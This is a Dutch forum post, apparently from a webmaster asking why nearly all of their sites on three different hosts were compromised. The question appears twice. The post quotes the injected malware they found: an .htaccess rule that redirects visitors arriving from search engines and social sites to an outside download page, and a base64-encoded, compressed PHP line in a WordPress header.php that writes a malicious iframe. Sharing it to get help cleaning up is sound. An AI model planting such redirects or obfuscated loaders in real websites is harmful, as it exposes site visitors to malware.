Dag,
Gisteren ben ik aangevallen door een hacker op verschillende websites door mij gemaakt.
De websites staan bij 3 verschillende providers.
De hacker stopt in de .htaccess en in header.php van mijn wordpress theme een regel code.
In het .htaccess bestand stond het volgende:
En in header.php dit:
Deze regel zorgt voor een iframe die verwijst naar een website. 3x linkte deze regel naar een website van een persoon die zelf ook slachtoffer is geweest en de overige keren verwees de iframe naar malware sites.
Daarnaast zag ik ook dat op 1 website, die niet op wordpress draait, ook was geinfecteerd. Deze website was slechts 1 simpele html pagina, zonder php.
Ik heb nu inmiddels al mijn code opgeschoond en de malware is weg. Maar toch ben ik ongerust. De hacker heeft al mijn sites (op 1 na) gehackt. De sites hebben totaal geen verband met elkaar, draaien op verschillende servers van verschillende providers. 1 site staat nog niet eens in de Google index, want die is niet af.
Mijn vraag is dan: Hoe komt het dat al mijn sites gehackt zijn? Is dit slechts toeval of weet de hacker iets van mij?
Gisteren ben ik aangevallen door een hacker op verschillende websites door mij gemaakt.
De websites staan bij 3 verschillende providers.
De hacker stopt in de .htaccess en in header.php van mijn wordpress theme een regel code.
In het .htaccess bestand stond het volgende:
Code:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://pahgawks.com/download/stats.php [R=301,L]
</IfModule>
#/c3284d#En in header.php dit:
PHP:
#c3284d#
echo(gzinflate(base64_decode("JY5BDsIgFET3TXoH8jfqpiQuFXoKL/AFBJQCgV/R20vtbvKSNzOiquIzMfpmI4HMh/gT37hTmMdBJ7UuJtLUiidzPAj/KLgYVouS4IjyhfOMzmJ71UmlhevUYkioeSWkOmWXgcVuSLg1T2QKsN6eQvDRSsCVErB/5T0VbYqE2AEGb6ME1Yc3wRlvHUk4A2tek9vSLPh+ZT6cruMg+P55/gE=")));
#/c3284d#Deze regel zorgt voor een iframe die verwijst naar een website. 3x linkte deze regel naar een website van een persoon die zelf ook slachtoffer is geweest en de overige keren verwees de iframe naar malware sites.
Daarnaast zag ik ook dat op 1 website, die niet op wordpress draait, ook was geinfecteerd. Deze website was slechts 1 simpele html pagina, zonder php.
Ik heb nu inmiddels al mijn code opgeschoond en de malware is weg. Maar toch ben ik ongerust. De hacker heeft al mijn sites (op 1 na) gehackt. De sites hebben totaal geen verband met elkaar, draaien op verschillende servers van verschillende providers. 1 site staat nog niet eens in de Google index, want die is niet af.
Mijn vraag is dan: Hoe komt het dat al mijn sites gehackt zijn? Is dit slechts toeval of weet de hacker iets van mij?
